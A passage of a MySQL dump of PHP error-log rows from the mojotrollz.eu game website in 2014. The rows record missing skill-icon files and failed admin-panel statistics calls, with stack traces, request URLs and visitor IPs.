'/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_sunder.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 94, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (340, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_disarm.png\' found.', '9d004896a81fe1cfdcb964f44629793965352133', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.016, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_disarm.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 92, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (341, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_reincarnation.png\' found.', '753cb42c5cc436893ed0e57d7b6e883f73fe1985', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_re...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_re...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.024, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_reincarnation.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 90, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (342, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_shieldwall.png\' found.', '20067d68c4c8fca8b9135adad8bf8a9a352354e8', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.008, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_shieldwall.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 88, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (343, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_thunderbolt.png\' found.', '453750c60c164f64019cb9764da3b2c903bbd5a2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_thunder...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_thunder...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.016, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_thunderbolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 86, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (344, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_shieldbash.png\' found.', 'c584f547463f1e939c8e33f3a6c6dfcf9e93aa0a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.032, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_shieldbash.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 84, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (345, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_sword_20.png\' found.', 'eeff61a36d020a29472e2d9e841b2c7b3cebeac8', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_sword_20.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_sword_20.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.016, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_sword_20.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 82, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (346, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_shield_05.png\' found.', 'ca53b44e3a3c4adca339cc5275ae58bce2207e1e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_shield_05.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_shield_05.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.024, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_shield_05.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 80, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (348, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod__system_sai_saimod_sys_log_action_stats_name_undefined', '754c76af68e5887a663a909e11514b712ed83822', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'\\\\SYSTEM\\\\SAI\\\\sai...\', \'sai_mod__system...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.012, '2014-11-28 13:21:08', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=undefined&filter=3600', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (349, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod__system_sai_saimod_sys_log_action_stats_name_vis', '0446e6fdb5cdc56f924e5fc171fc4a9c09183477', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'\\\\SYSTEM\\\\SAI\\\\sai...\', \'sai_mod__system...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.012, '2014-11-28 13:36:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=vis&filter=3600', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (350, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod__system_sai_saimod_sys_log_action_stats_name_basic_visitorfilter=undefined', '8a424c9f69aa452ae230081ddcaa664344d785ff', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'\\\\SYSTEM\\\\SAI\\\\sai...\', \'sai_mod__system...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.016, '2014-11-28 13:36:37', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitorfilter=undefined', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (351, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: filter Verifier: UINT', '6e3ee7702c1b44c5f4a5d3ef484e0169e56038ba', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 183, '#0 /home/web/webdir/mojotrollz/system/api/api.php(43): SYSTEM\\API\\api::do_parameters_opt(Array, Array, 220, \'basic_visitor\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.012, '2014-11-28 13:36:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=undefined', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (352, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 5; statics: 0; req_command: 3; req_param: 0; opt_param: 1; url: /web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=undefined', '3bee6ccd283b6390ef077a0fa8b89bc38849ed33', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.016, '2014-11-28 13:59:29', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=undefined', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (353, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 5; statics: 0; req_command: 3; req_param: 0; opt_param: 1; url: /web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=', 'f72c19f06d2a23788f44ab99c77dc96e30a043e7', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.016, '2014-11-28 14:00:34', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (354, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 5; statics: 0; req_command: 3; req_param: 0; opt_param: 1; url: /web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=2013.12.db', '5e5663b68b552d0f6680d3da00a8baead0aa9eed', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.016, '2014-11-28 14:00:37', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=2013.12.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (355, 'SYSTEM\\LOG\\ERROR', 'Class not found: SYSTEM\\SAI\\ERROR', 'd8f6c0600585e276faae1cffef714d44bfb3b11f', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'SYSTEM\\\\SAI\\\\ERRO...\')\n#1 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php(63): spl_autoload_call(\'SYSTEM\\\\SAI\\\\ERRO...\')\n#2 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'2592000\', \'2013.12.db\')\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.240', 0.096, '2014-11-28 14:18:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=2013.12.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (356, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [0] => \n [day] => \n [1] => 11\n [count] => 11\n [2] => 2\n [user_unique] => 2\n [3] => 2\n [ip_unique] => 2\n )\n\n)\n', '7ecedc98384c5dd464c39012a5a42fcefa323a93', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 63, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'2592000\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 1.60405, '2014-11-28 14:20:49', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=2013.12.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (357, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n)\n', '4b3aa129f01c832e894e9d4bf0886c2f3028f983', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 63, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'2592000\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.012, '2014-11-28 14:55:42', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=2013.12.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (358, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 2; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&filter=3600&db=2013.12.db', '2298bbd02682c2f13828ecd638d1c52c546c98fe', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.012, '2014-11-28 14:39:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (359, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&name=basic_success&filter=3600&db=2013.12.db', '76f9f7849658076fecd52dde364bf21b9acaf0cd', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, 